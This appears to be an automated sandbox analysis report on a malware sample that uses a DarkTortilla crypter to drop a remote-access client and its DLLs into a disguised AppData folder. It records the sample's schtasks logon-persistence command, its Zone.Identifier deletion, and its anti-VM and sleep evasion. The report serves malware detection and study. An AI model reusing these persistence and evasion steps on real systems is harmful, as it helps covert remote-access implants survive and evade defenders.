                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3305005916.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, client32.exe, 00000009.00000002.2890355521.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, pcicapi.dll.4.dr
                                Source: Binary string: mscat32.pdb source: mscat32.dll.4.dr
                                Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.4.dr

                                Data Obfuscation

                                barindex
                                Yara detected DarkTortilla Crypter
                                Source: Yara matchFile source: 0.2.Jjv9ha2GKn.exe.51e0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.Jjv9ha2GKn.exe.51e0000.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2751641971.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Jjv9ha2GKn.exe PID: 6512, type: MEMORYSTR
                                Source: netmsg.dll.4.drStatic PE information: 0xB44EAFAF [Tue Nov 10 05:14:23 2065 UTC]
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029200
                                Source: msauserext.dll.4.drStatic PE information: section name: .didat
                                Source: PCICL32.DLL.4.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B9EFD2 push esp; ret 0_2_05B9EFD9
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B9FE52 push eax; retf 0_2_05B9FE59
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B929D1 push esp; retf 0_2_05B929D2
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BCC4E0 push edi; iretd 0_2_05BCC4EE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BCA223 push esp; iretd 0_2_05BCA232
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BCB7F0 push ebp; iretd 0_2_05BCB7F6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BCB160 push ebx; iretd 0_2_05BCB166
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BC9E00 push edx; iretd 0_2_05BC9E0A
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BCBAF0 push edi; iretd 0_2_05BCC4BE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05BC9A28 push ecx; iretd 0_2_05BC9A42
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07159B34 pushad ; retf 0_2_07159B8D
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07151A0C push esp; ret 0_2_07151A9D
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07157979 push ecx; retf 0046h0_2_0715799A
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0715BCD7 push eax; iretd 0_2_0715BCE6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0715F0FF push edi; retf 0_2_0715F102
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07194BFB push edi; ret 0_2_07194DF6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07194E04 push eax; ret 0_2_07194E35
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07195A58 pushfd ; retf 0_2_07195A59
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_071974AD push ds; retf 0040h0_2_071974FE
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07AFA630 push 00000059h; ret 0_2_07AFA670
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07B3B06F push ecx; retf EFCDh0_2_07B3B1DA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041B9DD push esi; ret 4_2_0041B9E6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041C20E push eax; retf 4_2_0041C21D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041BC40 pushad ; ret 4_2_0041BC45
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041CD72 pushad ; ret 4_2_0041CE21
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004206B0 push ss; iretd 4_2_00420745
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00417F81 push ecx; ret 4_2_00417F94
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1116B735 push ecx; ret 7_2_1116B748
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11166629 push ecx; ret 7_2_1116663C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD76BBF push ecx; ret 7_2_6CD76BD2
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD694C5 push ecx; ret 7_2_6CD694D8
                                Source: msvcr100.dll.4.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: Jjv9ha2GKn.exe, n2P6H.csHigh entropy of concatenated method names: 'k9ER', 'c9HL', 'e9Y5', 'Dz7q', 'o3GN', 'c7BN', 'Ff65', 'Jn9c', 'g3LF', 'Ak2b'
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\msauserext.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\netmsg.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\mscat32.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\msvcr100.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\pcicapi.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\client32.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\neth.dllJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD57030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,7_2_6CD57030
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD45490 GetPrivateProfileIntA,7_2_6CD45490
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD450E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_6CD450E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD45117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_6CD45117

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11124DC0

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Hides that the sample has been downloaded from the Internet (zone.identifier)
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile opened: C:\Users\user\Desktop\Jjv9ha2GKn.exe\:Zone.Identifier read attributes | deleteJump to behavior
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 3785 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 3785 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,7_2_111365D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_11025180
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_11157550
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_110255D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1110F720 IsIconic,GetTickCount,7_2_1110F720
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110238A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110BFC50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11023F80
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11110340
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_11157150
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,9_2_11025180
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,9_2_11157550
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_110255D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1110F720 IsIconic,GetTickCount,9_2_1110F720
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,9_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,9_2_1111F990
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,9_2_110238A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,9_2_110BFC50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11023F80
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,9_2_11110340
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CA260
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,9_2_111365D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029200
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Yara detected AntiVM3
                                Source: Yara matchFile source: Process Memory Space: Jjv9ha2GKn.exe PID: 6512, type: MEMORYSTR
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD491F07_2_6CD491F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD54F307_2_6CD54F30
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110B7290 Sleep,ExitProcess,7_2_110B7290
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110B7290 Sleep,ExitProcess,9_2_110B7290
                                Found evasive API chain (may stop execution after checking mutex)
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-10745
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-10745
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 2500000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 2500000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 7C40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: 9E10000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: A1A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: B1A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: C1A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,7_2_6CD57F80
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeWindow / User API: threadDelayed 1724Jump to behavior
